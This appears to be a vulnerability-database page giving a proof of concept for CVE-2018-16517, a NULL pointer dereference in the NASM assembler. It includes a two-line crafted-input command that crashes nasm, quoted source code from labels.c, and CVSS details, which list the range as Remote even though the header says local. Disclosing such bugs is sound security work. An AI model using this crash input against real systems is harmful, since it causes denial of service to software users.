Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)

2019.04.24
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-476


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC) # Date: 2018-09-05 # Exploit Author: Fakhri Zulkifli # Vendor Homepage: https://www.nasm.us/ # Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D # Version: 2.14rc15 and earlier # Tested on: 2.14rc15 # CVE : CVE-2018-16517 asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file. PoC: 1. echo "equ push rax" > poc 2. nasm -f elf poc insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal(). [...] if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken /* there's a label here */ first = false; result->label = tokval.t_charptr; i = stdscan(NULL, &tokval); if (i == ':') { /* skip over the optional colon */ i = stdscan(NULL, &tokval); } else if (i == 0) { nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1, "label alone on a line without a colon might be in error"); } if (i != TOKEN_INSN || tokval.t_integer != I_EQU) { /* * FIXME: location.segment could be NO_SEG, in which case * it is possible we should be passing 'absolute.segment'. Look into this. * Work out whether that is *really* what we should be doing. * Generally fix things. I think this is right as it is, but * am still not certain. */ define_label(result->label, in_absolute ? absolute.segment : location.segment, location.offset, true); [...] static bool islocal(const char *l) { if (tasm_compatible_mode) { if (l[0] == '@' && l[1] == '@') return true; } return (l[0] == '.' && l[1] != '.'); <-- boom }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top